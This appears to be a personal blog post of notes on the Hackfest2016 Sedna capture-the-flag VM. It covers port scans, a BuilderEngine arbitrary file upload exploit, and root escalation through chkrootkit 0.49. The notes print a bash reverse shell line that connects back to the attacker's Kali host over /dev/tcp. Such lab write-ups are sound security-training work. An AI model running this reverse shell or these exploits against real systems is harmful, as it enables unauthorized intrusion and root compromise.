Skip to main content

32 VM hackfest2016: Sedna

Walkthru:

A. https://mendidsiren63.blogspot.com/2017/05/vulnhub-hackfest2016sedna-walkthrough.html [PUT method giving access forbidden, POSTER plugin renaming a file , exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899, ]

B. http://www.waywardpaladin.com/index.php?op=ViewArticle&articleId=3&blogId=1 [command line reverse shell, firefart or exploit 40839 but I am getting error upon compilation]

C. https://medium.com/@3wem/hackfest2016-sedna-ctf-de95f2ab0b4f [metasploit]

D. https://www.n00py.io/2017/03/vulnhub-walkthrough-hackfest2016-sedna/ [ditrycow]

Notes:

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protoc                                                                                                                               ol 2.0)
53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open  pop3        Dovecot pop3d
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp open  ssl/pop3 Dovecot pop3d
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open  unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)
00000000000000000000000000
dirb and nikto on port 80 and 8080, found some interesting folders/files and java server pages (JSP), some giving 403 access forbidden. JSP and Coyote shows many pages but not anything signficant.
Some vulns but nothing worked. Ran smb cmds but nothing so far. Robots.txt also didnt show anything or PUT method which also showed 403 access forbidden. Tried hydra for SMB and SSH for user "victor" but nothing 
00000000000000000000000000
Used https://www.exploit-db.com/exploits/40390/ to upload an arbitrary file . Tried to upload a file using POSTER plugin but it would rename the file and remove the PHP extension. The exploit also has an html code that can be used to upload a reverse shell file using POST method

$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ pwd
/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home
Tried many exploit for pric escalation but didn't work.  I decided to do more enumerations I found out chkrootkit is installed on the machine. To our luck version 0.49 is installed. This was found in privledge escalation script

Searching on searchsploit we have found an exploit for chkrootkit version 0.49. As per the vulnerability  chkrootkit will execute all the files with root privileges. We will now create a bash script for reverse shell and wget into "tmp" folder: 192.168.213.149 is Kali in this case

#! /bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1

Once the script is ready, we will wget the script into the "tmp" directory and make it executable.

Now we will start the listener on port 445 on our attacker machine and wait for the file to execute and send the reverse shell which was after 5-15 minutes. I could run it manually but it would give me www access only

00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000
smb_192.168.117.8.nmap
00000000000000000000000000


smb_192.168.117.8.nmap
00000000000000000000000000

Comments

Popular posts from this blog

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...